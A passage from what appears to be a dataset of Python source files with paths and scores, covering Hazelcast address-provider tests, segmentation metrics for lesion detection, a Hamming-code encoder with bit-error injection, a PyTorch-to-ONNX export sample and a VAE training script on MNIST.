provider = DefaultAddressProvider([])
address = Address("192.168.0.1", 5701)
actual = provider.translate(address)
self.assertEqual(address, actual)
def test_translate_none(self):
provider = DefaultAddressProvider([])
actual = provider.translate(None)
self.assertIsNone(actual) | tests/unit/discovery/default_address_provider_test.py | from unittest import TestCase
from hazelcast import six
from hazelcast.core import Address
from hazelcast.connection import DefaultAddressProvider
class DefaultAddressProviderTest(TestCase):
def test_load_addresses(self):
initial_list = ["192.168.0.1:5701"]
provider = DefaultAddressProvider(initial_list)
primaries, secondaries = provider.load_addresses()
six.assertCountEqual(self, primaries, [Address("192.168.0.1", 5701)])
six.assertCountEqual(self, secondaries, [])
def test_load_addresses_with_multiple_addresses(self):
initial_list = ["192.168.0.1:5701", "192.168.0.1:5702", "192.168.0.2:5701"]
provider = DefaultAddressProvider(initial_list)
primaries, secondaries = provider.load_addresses()
six.assertCountEqual(
self,
primaries,
[
Address("192.168.0.1", 5701),
Address("192.168.0.1", 5702),
Address("192.168.0.2", 5701),
],
)
six.assertCountEqual(self, secondaries, [])
# we deal with duplicate addresses in the ConnectionManager#_get_possible_addresses
def test_load_addresses_with_duplicate_addresses(self):
initial_list = ["192.168.0.1:5701", "192.168.0.1:5701"]
provider = DefaultAddressProvider(initial_list)
primaries, secondaries = provider.load_addresses()
six.assertCountEqual(
self, primaries, [Address("192.168.0.1", 5701), Address("192.168.0.1", 5701)]
)
six.assertCountEqual(self, secondaries, [])
def test_load_addresses_with_empty_addresses(self):
initial_list = []
provider = DefaultAddressProvider(initial_list)
primaries, secondaries = provider.load_addresses()
six.assertCountEqual(self, primaries, [Address("127.0.0.1", 5701)])
six.assertCountEqual(
self, secondaries, [Address("127.0.0.1", 5702), Address("127.0.0.1", 5703)]
)
def test_load_addresses_without_port(self):
initial_list = ["192.168.0.1"]
provider = DefaultAddressProvider(initial_list)
primaries, secondaries = provider.load_addresses()
six.assertCountEqual(self, primaries, [Address("192.168.0.1", 5701)])
six.assertCountEqual(
self, secondaries, [Address("192.168.0.1", 5702), Address("192.168.0.1", 5703)]
)
def test_translate(self):
provider = DefaultAddressProvider([])
address = Address("192.168.0.1", 5701)
actual = provider.translate(address)
self.assertEqual(address, actual)
def test_translate_none(self):
provider = DefaultAddressProvider([])
actual = provider.translate(None)
self.assertIsNone(actual) | 0.807688 | 0.469824 |
import os
from os.path import join as jp
from collections import defaultdict
from tqdm import tqdm
import numpy as np
import pandas as pd
from skimage.measure import label
from dpipe.io import load_json, save_json, load_pred
from dpipe.medim.metrics import dice_score, fraction
from dpipe.commands import load_from_folder
from lowres.utils import get_pred, volume2diameter, np_sigmoid
def get_intersection_stat_dice_id(cc_mask, one_cc, pred=None, logit=None):
"""Returns max local dice and corresponding stat to this hit component.
If ``pred`` is ``None``, ``cc_mask`` treated as ground truth and stat sets to be 1."""
hit_components = np.unique(cc_mask[one_cc])
hit_components = hit_components[hit_components != 0]
hit_stats = dict(zip(['hit_max', 'hit_median', 'hit_q95', 'hit_logit'], [[], [], [], []]))
hit_dice, hit_id = [], []
for n in hit_components:
cc_mask_hit_one = cc_mask == n
hit_dice.append(dice_score(cc_mask_hit_one, one_cc))
hit_id.append(n)
hit_stats['hit_max'].append(1. if pred is None else np.max(pred[cc_mask_hit_one]))
hit_stats['hit_median'].append(1. if pred is None else np.median(pred[cc_mask_hit_one]))
hit_stats['hit_q95'].append(1. if pred is None else np.percentile(pred[cc_mask_hit_one], q=95))
hit_stats['hit_logit'].append(np.inf if logit is None else np.max(logit[cc_mask_hit_one]))
if len(hit_dice) == 0:
return dict(zip(['hit_max', 'hit_median', 'hit_q95', 'hit_logit'], [0., 0., 0., -np.inf])), 0., None
else:
max_idx = np.argmax(hit_dice)
hit_id = np.array(hit_id)[max_idx]
hit_stats['hit_max'] = np.array(hit_stats['hit_max'])[max_idx]
hit_stats['hit_median'] = np.array(hit_stats['hit_median'])[max_idx]
hit_stats['hit_q95'] = np.array(hit_stats['hit_q95'])[max_idx]
hit_stats['hit_logit'] = np.array(hit_stats['hit_logit'])[max_idx]
return hit_stats, np.max(hit_dice), hit_id
def prc_records(segm, pred, logit):
segm_split, segm_n_splits = label(get_pred(segm), return_num=True)
pred_split, pred_n_splits = label(get_pred(pred), return_num=True)
records = []
for n in range(1, segm_n_splits + 1):
record = {}
segm_cc = segm_split == n
record['obj'] = f'tum_{n}'
record['is_tum'] = True
record['diameter'] = volume2diameter(np.sum(segm_cc))
stats, dice, hit_id = get_intersection_stat_dice_id(cc_mask=pred_split, one_cc=segm_cc,
pred=pred[0], logit=logit[0])
record['hit_dice'] = dice
record['hit_max'], record['hit_median'], record['hit_q95'], record['hit_logit'] = stats.values()
record['hit_stat'] = record['hit_max'] # backward compatibility
record['hit_obj'] = f'pred_{hit_id}'
record['self_stat'] = 1.
record['self_logit'] = np.inf
records.append(record)
for n in range(1, pred_n_splits + 1):
record = {}
pred_cc = pred_split == n
record['obj'] = f'pred_{n}'
record['is_tum'] = False
record['diameter'] = volume2diameter(np.sum(pred_cc))
stats, dice, hit_id = get_intersection_stat_dice_id(cc_mask=segm_split, one_cc=pred_cc)
record['hit_dice'] = dice
record['hit_max'], record['hit_median'], record['hit_q95'], record['hit_logit'] = stats.values()
record['hit_stat'] = record['hit_max'] # backward compatibility
record['hit_obj'] = f'tum_{hit_id}'
record['self_stat'] = np.max(pred[0][pred_cc])
record['self_logit'] = np.max(logit[0][pred_cc])
records.append(record)
return records
def exp2prc_df(exp_path, n_val=5, specific_ids=None):
"""Constructs pandas DataFrame with prc data from all predictions in ``exp_path``."""
dfs = []
for n in range(n_val):
prc_path = jp(exp_path, f'experiment_{n}', 'test_metrics', 'prc_records.json')
prc_dicts = load_json(prc_path)
for _id in prc_dicts.keys():
if specific_ids is None:
[d.update({'id': _id}) for d in prc_dicts[_id]]
dfs.append(pd.DataFrame.from_records(prc_dicts[_id]))
else:
if _id in specific_ids:
[d.update({'id': _id}) for d in prc_dicts[_id]]
dfs.append(pd.DataFrame.from_records(prc_dicts[_id]))
df = pd.concat(dfs)
return df
def get_size_df(df, size='small'):
"""Takes rows from DataFrame with specified lesion size"""
if size == 'total':
return df
else:
target_df = df[df['is_tum']]
pred_df = df[~df['is_tum']]
target_size_df = target_df[target_df['size'] == size]
pred_size_df = pred_df[pred_df['size'] == size]
size_df = pd.concat([target_size_df, pred_size_df])
for index in target_size_df.index:
_id, obj, hit_obj = target_size_df[['id', 'obj', 'hit_obj']].loc[index]
if hit_obj:
linked_predict = df[(df.id == _id) & (df.hit_obj == obj)]
size_df = pd.concat([size_df, linked_predict])
return size_df
def get_prc_met(df, thresholds=None, dice_th=0, hit_stat='hit_stat', self_stat='self_stat'):
"""Collects necessary data for building prc for mets experiments"""
if thresholds is None:
thresholds = np_sigmoid(np.linspace(0, 5, num=51))
precision, recall, total_fp, avg_dice, std_dice = [], [], [], [], []
for th in thresholds:
conf_dict = {'tp': 0, 'fp': 0, 'fn': 0}
th_df = df[df[self_stat] >= th]
target_df = th_df[th_df['is_tum']]
pred_df = th_df[~th_df['is_tum']]
conf_dict['fp'] = len(pred_df[(pred_df['hit_dice'] <= dice_th) & (pred_df[self_stat] > th)])
conf_dict['tp'] = len(target_df[(target_df['hit_dice'] > dice_th) & (target_df[hit_stat] >= th)])
conf_dict['fn'] = len(target_df[(target_df['hit_dice'] <= dice_th) | (target_df[hit_stat] < th)])
local_dices = target_df['hit_dice'][(target_df['hit_dice'] > dice_th) & (target_df[hit_stat] >= th)]
precision.append(fraction(conf_dict['tp'], conf_dict['tp'] + conf_dict['fp']))
recall.append(fraction(conf_dict['tp'], conf_dict['tp'] + conf_dict['fn']))
total_fp.append(conf_dict['fp'])
avg_dice.append(np.mean(local_dices))
std_dice.append(np.std(local_dices))
return {'precision': precision, 'recall': recall, 'totalFP': total_fp, 'avg_dice': avg_dice, 'std_dice': std_dice}
def evaluate_individual_metrics_with_prc(load_y_true, metrics: dict,
predictions_path, logits_path, results_path, exist_ok=False):
assert len(metrics) > 0, 'No metric provided'
os.makedirs(results_path, exist_ok=exist_ok)
results = defaultdict(dict)
for identifier, prediction in tqdm(load_from_folder(predictions_path)):
target = load_y_true(identifier)
for metric_name, metric in metrics.items():
if metric_name == 'prc_records':
logit = load_pred(identifier, logits_path)
results[metric_name][identifier] = metric(target, prediction, logit)
else:
results[metric_name][identifier] = metric(target, prediction)
for metric_name, result in results.items():
save_json(result, os.path.join(results_path, metric_name + '.json'), indent=0) | lowres/metric.py | import os
from os.path import join as jp
from collections import defaultdict
from tqdm import tqdm
import numpy as np
import pandas as pd
from skimage.measure import label
from dpipe.io import load_json, save_json, load_pred
from dpipe.medim.metrics import dice_score, fraction
from dpipe.commands import load_from_folder
from lowres.utils import get_pred, volume2diameter, np_sigmoid
def get_intersection_stat_dice_id(cc_mask, one_cc, pred=None, logit=None):
"""Returns max local dice and corresponding stat to this hit component.
If ``pred`` is ``None``, ``cc_mask`` treated as ground truth and stat sets to be 1."""
hit_components = np.unique(cc_mask[one_cc])
hit_components = hit_components[hit_components != 0]
hit_stats = dict(zip(['hit_max', 'hit_median', 'hit_q95', 'hit_logit'], [[], [], [], []]))
hit_dice, hit_id = [], []
for n in hit_components:
cc_mask_hit_one = cc_mask == n
hit_dice.append(dice_score(cc_mask_hit_one, one_cc))
hit_id.append(n)
hit_stats['hit_max'].append(1. if pred is None else np.max(pred[cc_mask_hit_one]))
hit_stats['hit_median'].append(1. if pred is None else np.median(pred[cc_mask_hit_one]))
hit_stats['hit_q95'].append(1. if pred is None else np.percentile(pred[cc_mask_hit_one], q=95))
hit_stats['hit_logit'].append(np.inf if logit is None else np.max(logit[cc_mask_hit_one]))
if len(hit_dice) == 0:
return dict(zip(['hit_max', 'hit_median', 'hit_q95', 'hit_logit'], [0., 0., 0., -np.inf])), 0., None
else:
max_idx = np.argmax(hit_dice)
hit_id = np.array(hit_id)[max_idx]
hit_stats['hit_max'] = np.array(hit_stats['hit_max'])[max_idx]
hit_stats['hit_median'] = np.array(hit_stats['hit_median'])[max_idx]
hit_stats['hit_q95'] = np.array(hit_stats['hit_q95'])[max_idx]
hit_stats['hit_logit'] = np.array(hit_stats['hit_logit'])[max_idx]
return hit_stats, np.max(hit_dice), hit_id
def prc_records(segm, pred, logit):
segm_split, segm_n_splits = label(get_pred(segm), return_num=True)
pred_split, pred_n_splits = label(get_pred(pred), return_num=True)
records = []
for n in range(1, segm_n_splits + 1):
record = {}
segm_cc = segm_split == n
record['obj'] = f'tum_{n}'
record['is_tum'] = True
record['diameter'] = volume2diameter(np.sum(segm_cc))
stats, dice, hit_id = get_intersection_stat_dice_id(cc_mask=pred_split, one_cc=segm_cc,
pred=pred[0], logit=logit[0])
record['hit_dice'] = dice
record['hit_max'], record['hit_median'], record['hit_q95'], record['hit_logit'] = stats.values()
record['hit_stat'] = record['hit_max'] # backward compatibility
record['hit_obj'] = f'pred_{hit_id}'
record['self_stat'] = 1.
record['self_logit'] = np.inf
records.append(record)
for n in range(1, pred_n_splits + 1):
record = {}
pred_cc = pred_split == n
record['obj'] = f'pred_{n}'
record['is_tum'] = False
record['diameter'] = volume2diameter(np.sum(pred_cc))
stats, dice, hit_id = get_intersection_stat_dice_id(cc_mask=segm_split, one_cc=pred_cc)
record['hit_dice'] = dice
record['hit_max'], record['hit_median'], record['hit_q95'], record['hit_logit'] = stats.values()
record['hit_stat'] = record['hit_max'] # backward compatibility
record['hit_obj'] = f'tum_{hit_id}'
record['self_stat'] = np.max(pred[0][pred_cc])
record['self_logit'] = np.max(logit[0][pred_cc])
records.append(record)
return records
def exp2prc_df(exp_path, n_val=5, specific_ids=None):
"""Constructs pandas DataFrame with prc data from all predictions in ``exp_path``."""
dfs = []
for n in range(n_val):
prc_path = jp(exp_path, f'experiment_{n}', 'test_metrics', 'prc_records.json')
prc_dicts = load_json(prc_path)
for _id in prc_dicts.keys():
if specific_ids is None:
[d.update({'id': _id}) for d in prc_dicts[_id]]
dfs.append(pd.DataFrame.from_records(prc_dicts[_id]))
else:
if _id in specific_ids:
[d.update({'id': _id}) for d in prc_dicts[_id]]
dfs.append(pd.DataFrame.from_records(prc_dicts[_id]))
df = pd.concat(dfs)
return df
def get_size_df(df, size='small'):
"""Takes rows from DataFrame with specified lesion size"""
if size == 'total':
return df
else:
target_df = df[df['is_tum']]
pred_df = df[~df['is_tum']]
target_size_df = target_df[target_df['size'] == size]
pred_size_df = pred_df[pred_df['size'] == size]
size_df = pd.concat([target_size_df, pred_size_df])
for index in target_size_df.index:
_id, obj, hit_obj = target_size_df[['id', 'obj', 'hit_obj']].loc[index]
if hit_obj:
linked_predict = df[(df.id == _id) & (df.hit_obj == obj)]
size_df = pd.concat([size_df, linked_predict])
return size_df
def get_prc_met(df, thresholds=None, dice_th=0, hit_stat='hit_stat', self_stat='self_stat'):
"""Collects necessary data for building prc for mets experiments"""
if thresholds is None:
thresholds = np_sigmoid(np.linspace(0, 5, num=51))
precision, recall, total_fp, avg_dice, std_dice = [], [], [], [], []
for th in thresholds:
conf_dict = {'tp': 0, 'fp': 0, 'fn': 0}
th_df = df[df[self_stat] >= th]
target_df = th_df[th_df['is_tum']]
pred_df = th_df[~th_df['is_tum']]
conf_dict['fp'] = len(pred_df[(pred_df['hit_dice'] <= dice_th) & (pred_df[self_stat] > th)])
conf_dict['tp'] = len(target_df[(target_df['hit_dice'] > dice_th) & (target_df[hit_stat] >= th)])
conf_dict['fn'] = len(target_df[(target_df['hit_dice'] <= dice_th) | (target_df[hit_stat] < th)])
local_dices = target_df['hit_dice'][(target_df['hit_dice'] > dice_th) & (target_df[hit_stat] >= th)]
precision.append(fraction(conf_dict['tp'], conf_dict['tp'] + conf_dict['fp']))
recall.append(fraction(conf_dict['tp'], conf_dict['tp'] + conf_dict['fn']))
total_fp.append(conf_dict['fp'])
avg_dice.append(np.mean(local_dices))
std_dice.append(np.std(local_dices))
return {'precision': precision, 'recall': recall, 'totalFP': total_fp, 'avg_dice': avg_dice, 'std_dice': std_dice}
def evaluate_individual_metrics_with_prc(load_y_true, metrics: dict,
predictions_path, logits_path, results_path, exist_ok=False):
assert len(metrics) > 0, 'No metric provided'
os.makedirs(results_path, exist_ok=exist_ok)
results = defaultdict(dict)
for identifier, prediction in tqdm(load_from_folder(predictions_path)):
target = load_y_true(identifier)
for metric_name, metric in metrics.items():
if metric_name == 'prc_records':
logit = load_pred(identifier, logits_path)
results[metric_name][identifier] = metric(target, prediction, logit)
else:
results[metric_name][identifier] = metric(target, prediction)
for metric_name, result in results.items():
save_json(result, os.path.join(results_path, metric_name + '.json'), indent=0) | 0.580709 | 0.163579 |
"""Module for personal hamming coder."""
import argparse
import time
import os
import hammcoder
import binpacker
import errormaker
def setup_parser():
'''
Basic parser setup for simple hamming command line input.
'''
parser = argparse.ArgumentParser(description='Command line hamming coder')
parser.add_argument("-i", "--input", required=True,
help="Insert path to input file.")
parser.add_argument("-o", "--output", required=True,
help="Insert path to output file.")
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-K", "--encode", action="store_true",
help="Swiches to encoding")
group.add_argument("-D", "--decode", action="store_true",
help="Swiches to decoding")
group.add_argument("-1", "--singleerror", action="store_true",
help="Injects input file with single bit errors")
group.add_argument("-2", "--doubleerror", action="store_true",
help="Injects input file with double bit errors")
group.add_argument("-3", "--tripleerror", action="store_true",
help="Injects input file with triple bit errors")
group.add_argument("-R", "--randomerror", action="store_true",
help="Injects input file with random bit errors")
return parser
def main():
'''
Main program handler
'''
parser = setup_parser()
args = parser.parse_args()
inputfile = args.input
outputfile = args.output
#inputfile = "input.txt"
#outputfile = "output.hamm"
#inputfile = "output.hamm"
#outputfile = "input.rebulild.txt"
##inputfile = "output.hamm"
##outputfile = "output.singleerrors.hamm"
#inputfile = "output.singleerrors.hamm"
#outputfile = "input.rebulild.txt"
print "Welcome to Hamming code command line tool."
print "<NAME> (jan.gabriel(at)tul.cz"
print "========================================================"
print "from: " + inputfile + " =====>>>>> to: " + outputfile
if(args.encode):
print "You have selected to ENCODE"
print "========================================================"
start_time = time.time()
with open(inputfile, "rb") as ifile:
buff = binpacker.readBinaryToEncode(ifile)
output = hammcoder.hammingEncode(buff)
with open(outputfile, "wb") as ofile:
binpacker.writeBinaryToEncode(ofile, output)
end_time = time.time()
oldsize = os.path.getsize(inputfile)
newsize = os.path.getsize(outputfile)
compratio = (newsize / float(oldsize)) * 100
insec = end_time - start_time
print "You have succesfully ENCODED the file!"
print "%.3fkB => %.3fkB = %.2f" % (oldsize / 1000.0,
newsize / 1000.0, compratio) + "% increase in file size."
print "===================In: %.5s seconds!===================" % insec
elif(args.decode):
print "You have selected to DECODE"
print "========================================================"
start_time = time.time()
with open(inputfile, "rb") as ifile:
buff = binpacker.readBinaryToDecode(ifile)
output = hammcoder.hammingDecode(buff)
with open(outputfile, "wb") as ofile:
binpacker.writeBinaryToDecode(ofile, output["output"])
end_time = time.time()
oldsize = os.path.getsize(inputfile)
newsize = os.path.getsize(outputfile)
compratio = (newsize / float(oldsize)) * 100
insec = end_time - start_time
if len(output["log"]) == 0:
print "You have succesfully DECODED the file!"
else:
for log in output["log"]:
print log
print "%.3fkB => %.3fkB = %.2f" % (oldsize / 1000.0,
newsize / 1000.0, compratio) + "% decrease in file size."
print "===================In: %.5s seconds!===================" % insec
elif(args.singleerror or args.doubleerror
or args.tripleerror or args.randomerror):
start_time = time.time()
with open(inputfile, "rb") as ifile:
buff = binpacker.readBinaryToDecode(ifile)
if(args.singleerror):
print "You have selected to INJECT SINGLE ERRORS"
print "========================================================"
buff = errormaker.makeSingleError(buff)
elif(args.doubleerror):
print "You have selected to INJECT DOUBLE ERRORS"
print "========================================================"
buff = errormaker.makeDoubleError(buff)
elif(args.tripleerror):
print "You have selected to INJECT TRIPLE ERRORS"
print "========================================================"
buff = errormaker.makeTripleError(buff)
elif(args.randomerror):
print "You have selected to INJECT RANDOM ERRORS"
print "========================================================"
buff = errormaker.makeRandomError(buff)
with open(outputfile, "wb") as ofile:
binpacker.writeBinaryToEncode(ofile, buff)
end_time = time.time()
insec = end_time - start_time
print "You have succesfully INJECTED ERRORS!"
print "===================In: %.5s seconds!===================" % insec
else:
print "Sorry, something went terribly wrong!"
os.system("pause")
return 0
if __name__ == "__main__":
main() | hamming-python/hamming_main.py | """Module for personal hamming coder."""
import argparse
import time
import os
import hammcoder
import binpacker
import errormaker
def setup_parser():
'''
Basic parser setup for simple hamming command line input.
'''
parser = argparse.ArgumentParser(description='Command line hamming coder')
parser.add_argument("-i", "--input", required=True,
help="Insert path to input file.")
parser.add_argument("-o", "--output", required=True,
help="Insert path to output file.")
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-K", "--encode", action="store_true",
help="Swiches to encoding")
group.add_argument("-D", "--decode", action="store_true",
help="Swiches to decoding")
group.add_argument("-1", "--singleerror", action="store_true",
help="Injects input file with single bit errors")
group.add_argument("-2", "--doubleerror", action="store_true",
help="Injects input file with double bit errors")
group.add_argument("-3", "--tripleerror", action="store_true",
help="Injects input file with triple bit errors")
group.add_argument("-R", "--randomerror", action="store_true",
help="Injects input file with random bit errors")
return parser
def main():
'''
Main program handler
'''
parser = setup_parser()
args = parser.parse_args()
inputfile = args.input
outputfile = args.output
#inputfile = "input.txt"
#outputfile = "output.hamm"
#inputfile = "output.hamm"
#outputfile = "input.rebulild.txt"
##inputfile = "output.hamm"
##outputfile = "output.singleerrors.hamm"
#inputfile = "output.singleerrors.hamm"
#outputfile = "input.rebulild.txt"
print "Welcome to Hamming code command line tool."
print "<NAME> (jan.gabriel(at)tul.cz"
print "========================================================"
print "from: " + inputfile + " =====>>>>> to: " + outputfile
if(args.encode):
print "You have selected to ENCODE"
print "========================================================"
start_time = time.time()
with open(inputfile, "rb") as ifile:
buff = binpacker.readBinaryToEncode(ifile)
output = hammcoder.hammingEncode(buff)
with open(outputfile, "wb") as ofile:
binpacker.writeBinaryToEncode(ofile, output)
end_time = time.time()
oldsize = os.path.getsize(inputfile)
newsize = os.path.getsize(outputfile)
compratio = (newsize / float(oldsize)) * 100
insec = end_time - start_time
print "You have succesfully ENCODED the file!"
print "%.3fkB => %.3fkB = %.2f" % (oldsize / 1000.0,
newsize / 1000.0, compratio) + "% increase in file size."
print "===================In: %.5s seconds!===================" % insec
elif(args.decode):
print "You have selected to DECODE"
print "========================================================"
start_time = time.time()
with open(inputfile, "rb") as ifile:
buff = binpacker.readBinaryToDecode(ifile)
output = hammcoder.hammingDecode(buff)
with open(outputfile, "wb") as ofile:
binpacker.writeBinaryToDecode(ofile, output["output"])
end_time = time.time()
oldsize = os.path.getsize(inputfile)
newsize = os.path.getsize(outputfile)
compratio = (newsize / float(oldsize)) * 100
insec = end_time - start_time
if len(output["log"]) == 0:
print "You have succesfully DECODED the file!"
else:
for log in output["log"]:
print log
print "%.3fkB => %.3fkB = %.2f" % (oldsize / 1000.0,
newsize / 1000.0, compratio) + "% decrease in file size."
print "===================In: %.5s seconds!===================" % insec
elif(args.singleerror or args.doubleerror
or args.tripleerror or args.randomerror):
start_time = time.time()
with open(inputfile, "rb") as ifile:
buff = binpacker.readBinaryToDecode(ifile)
if(args.singleerror):
print "You have selected to INJECT SINGLE ERRORS"
print "========================================================"
buff = errormaker.makeSingleError(buff)
elif(args.doubleerror):
print "You have selected to INJECT DOUBLE ERRORS"
print "========================================================"
buff = errormaker.makeDoubleError(buff)
elif(args.tripleerror):
print "You have selected to INJECT TRIPLE ERRORS"
print "========================================================"
buff = errormaker.makeTripleError(buff)
elif(args.randomerror):
print "You have selected to INJECT RANDOM ERRORS"
print "========================================================"
buff = errormaker.makeRandomError(buff)
with open(outputfile, "wb") as ofile:
binpacker.writeBinaryToEncode(ofile, buff)
end_time = time.time()
insec = end_time - start_time
print "You have succesfully INJECTED ERRORS!"
print "===================In: %.5s seconds!===================" % insec
else:
print "Sorry, something went terribly wrong!"
os.system("pause")
return 0
if __name__ == "__main__":
main() | 0.531209 | 0.152316 |
import cv2
import onnx
import torch
from albumentations import (Compose,Resize,)
from albumentations.augmentations.transforms import Normalize
from albumentations.pytorch.transforms import ToTensor
from torchvision import models
import os
def preprocess_image(img_path):
# transformations for the input data
transforms = Compose([
Resize(224, 224, interpolation=cv2.INTER_NEAREST),
Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
ToTensor(),
])
# read input image
input_img = cv2.imread(img_path)
# do transformations
input_data = transforms(image=input_img)["image"]
# prepare batch
batch_data = torch.unsqueeze(input_data, 0)
return batch_data
def postprocess(output_data):
# get class names
with open("imagenet_classes.txt") as f:
classes = [line.strip() for line in f.readlines()]
# calculate human-readable value by softmax
confidences = torch.nn.functional.softmax(output_data, dim=1)[0] * 100
# find top predicted classes
_, indices = torch.sort(output_data, descending=True)
i = 0
# print the top classes predicted by the model
while confidences[indices[0][i]] > 0.5:
class_idx = indices[0][i]
print(
"class:",
classes[class_idx],
", confidence:",
confidences[class_idx].item(),
"%, index:",
class_idx.item(),
)
i += 1
def main():
# load pre-trained model -------------------------------------------------------------------------------------------
os.environ['CUDA_VISIBLE_DEVICES'] = '6'
model = models.resnet50(pretrained=True)
# preprocessing stage ----------------------------------------------------------------------------------------------
input = preprocess_image("turkish_coffee.jpg").cuda()
# inference stage --------------------------------------------------------------------------------------------------
model.eval()
model.cuda()
output = model(input)
# post-processing stage --------------------------------------------------------------------------------------------
postprocess(output)
# convert to ONNX --------------------------------------------------------------------------------------------------
ONNX_FILE_PATH = "resnet50.onnx"
torch.onnx.export(model, input, ONNX_FILE_PATH, input_names=["input"], output_names=["output"], export_params=True)
onnx_model = onnx.load(ONNX_FILE_PATH)
# check that the model converted fine
onnx.checker.check_model(onnx_model)
print("Model was successfully converted to ONNX format.")
print("It was saved to", ONNX_FILE_PATH)
if __name__ == '__main__':
main() | samples/PyTorch-ONNX-TensorRT/pytorch_model.py | import cv2
import onnx
import torch
from albumentations import (Compose,Resize,)
from albumentations.augmentations.transforms import Normalize
from albumentations.pytorch.transforms import ToTensor
from torchvision import models
import os
def preprocess_image(img_path):
# transformations for the input data
transforms = Compose([
Resize(224, 224, interpolation=cv2.INTER_NEAREST),
Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
ToTensor(),
])
# read input image
input_img = cv2.imread(img_path)
# do transformations
input_data = transforms(image=input_img)["image"]
# prepare batch
batch_data = torch.unsqueeze(input_data, 0)
return batch_data
def postprocess(output_data):
# get class names
with open("imagenet_classes.txt") as f:
classes = [line.strip() for line in f.readlines()]
# calculate human-readable value by softmax
confidences = torch.nn.functional.softmax(output_data, dim=1)[0] * 100
# find top predicted classes
_, indices = torch.sort(output_data, descending=True)
i = 0
# print the top classes predicted by the model
while confidences[indices[0][i]] > 0.5:
class_idx = indices[0][i]
print(
"class:",
classes[class_idx],
", confidence:",
confidences[class_idx].item(),
"%, index:",
class_idx.item(),
)
i += 1
def main():
# load pre-trained model -------------------------------------------------------------------------------------------
os.environ['CUDA_VISIBLE_DEVICES'] = '6'
model = models.resnet50(pretrained=True)
# preprocessing stage ----------------------------------------------------------------------------------------------
input = preprocess_image("turkish_coffee.jpg").cuda()
# inference stage --------------------------------------------------------------------------------------------------
model.eval()
model.cuda()
output = model(input)
# post-processing stage --------------------------------------------------------------------------------------------
postprocess(output)
# convert to ONNX --------------------------------------------------------------------------------------------------
ONNX_FILE_PATH = "resnet50.onnx"
torch.onnx.export(model, input, ONNX_FILE_PATH, input_names=["input"], output_names=["output"], export_params=True)
onnx_model = onnx.load(ONNX_FILE_PATH)
# check that the model converted fine
onnx.checker.check_model(onnx_model)
print("Model was successfully converted to ONNX format.")
print("It was saved to", ONNX_FILE_PATH)
if __name__ == '__main__':
main() | 0.463201 | 0.375163 |
import os
import fire
import numpy as np
import torch
from torch import optim
from torch.utils.tensorboard import SummaryWriter
from torchvision import datasets, transforms
from libs.Visualize import Visualize
from models.VAE import VAE
class Main():
def __init__(self, z_dim):
"""Constructor
Args:
z_dim (int): Dimensions of the latent variable.
Returns:
None.
"""
self.z_dim = z_dim
self.dataloader_train = None
self.dataloader_valid = None
self.dataloader_test = None
self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
self.model = VAE(self.z_dim).to(self.device)
self.writer = SummaryWriter(log_dir="./logs")
self.lr = 0.001
self.optimizer = optim.Adam(self.model.parameters(), lr=self.lr)
self.num_max_epochs = 1000
self.num_no_improved = 0
self.num_batch_train = 0
self.num_batch_valid = 0
self.loss_valid = 10 ** 7 # Initialize with a large value
self.loss_valid_min = 10 ** 7 # Initialize with a large value
self.Visualize = Visualize(self.z_dim, self.dataloader_test, self.model, self.device)
def createDirectories(self):
"""Create directories for the tensorboard and learned model
Args:
None.
Returns:
None.
"""
if not os.path.exists("./logs"):
os.makedirs("./logs")
if not os.path.exists("./params"):
os.makedirs("./params")
def createDataLoader(self):
"""Download MNIST and convert it to data loaders
Args:
None.
Returns:
None.
"""
transform = transforms.Compose([transforms.ToTensor(), transforms.Lambda(lambda x: x.view(-1))]) # Preprocessing for MNIST images
dataset_train_valid = datasets.MNIST("./", train=True, download=True, transform=transform) # Separate train data and test data to get a dataset
dataset_test = datasets.MNIST("./", train=False, download=True, transform=transform)
# Use 20% of train data as validation data
size_train_valid = len(dataset_train_valid) # 60000
size_train = int(size_train_valid * 0.8) # 48000
size_valid = size_train_valid - size_train # 12000
dataset_train, dataset_valid = torch.utils.data.random_split(dataset_train_valid, [size_train, size_valid])
# Create dataloaders from the datasets
self.dataloader_train = torch.utils.data.DataLoader(dataset_train, batch_size=1000, shuffle=True)
self.dataloader_valid = torch.utils.data.DataLoader(dataset_valid, batch_size=1000, shuffle=False)
self.dataloader_test = torch.utils.data.DataLoader(dataset_test, batch_size=1000, shuffle=False)
self.Visualize.dataloader_test = self.dataloader_test
def train_batch(self):
"""Batch-based learning for training data
Args:
None.
Returns:
None.
"""
self.model.train()
for x, _ in self.dataloader_train:
lower_bound, _, _ = self.model(x, self.device)
loss = -sum(lower_bound)
self.model.zero_grad()
loss.backward()
self.optimizer.step()
self.writer.add_scalar("Loss_train/KL", -lower_bound[0].cpu().detach().numpy(), self.num_iter + self.num_batch_train)
self.writer.add_scalar("Loss_train/Reconst", -lower_bound[1].cpu().detach().numpy(), self.num_iter + self.num_batch_train)
self.num_batch_train += 1
self.num_batch_train -= 1
def valid_batch(self):
"""Batch-based learning for validating data
Args:
None.
Returns:
None.
"""
loss = []
self.model.eval()
for x, _ in self.dataloader_valid:
lower_bound, _, _ = self.model(x, self.device)
loss.append(-sum(lower_bound).cpu().detach().numpy())
self.writer.add_scalar("Loss_valid/KL", -lower_bound[0].cpu().detach().numpy(), self.num_iter + self.num_batch_valid)
self.writer.add_scalar("Loss_valid/Reconst", -lower_bound[1].cpu().detach().numpy(), self.num_iter + self.num_batch_valid)
self.num_batch_valid += 1
self.num_batch_valid -= 1
self.loss_valid = np.mean(loss)
self.loss_valid_min = np.minimum(self.loss_valid_min, self.loss_valid)
def early_stopping(self):
"""Judging early stopping
Args:
None.
Returns:
None.
"""
if self.loss_valid_min < self.loss_valid: # If the loss of this iteration is greater than the minimum loss of the previous iterations, the counter variable is incremented.
self.num_no_improved += 1
print(f"Validation got worse for the {self.num_no_improved} time in a row.")
else: # If the loss of this iteration is the same or smaller than the minimum loss of the previous iterations, reset the counter variable and save parameters.
self.num_no_improved = 0
torch.save(self.model.state_dict(), f"./params/model_z_{self.z_dim}.pth")
def main(self):
self.createDirectories()
self.createDataLoader()
print("-----Start training-----")
for self.num_iter in range(self.num_max_epochs):
self.train_batch()
self.valid_batch()
print(f"[EPOCH{self.num_iter + 1}] loss_valid: {int(self.loss_valid)} | Loss_valid_min: {int(self.loss_valid_min)}")
self.early_stopping()
if self.num_no_improved >= 10:
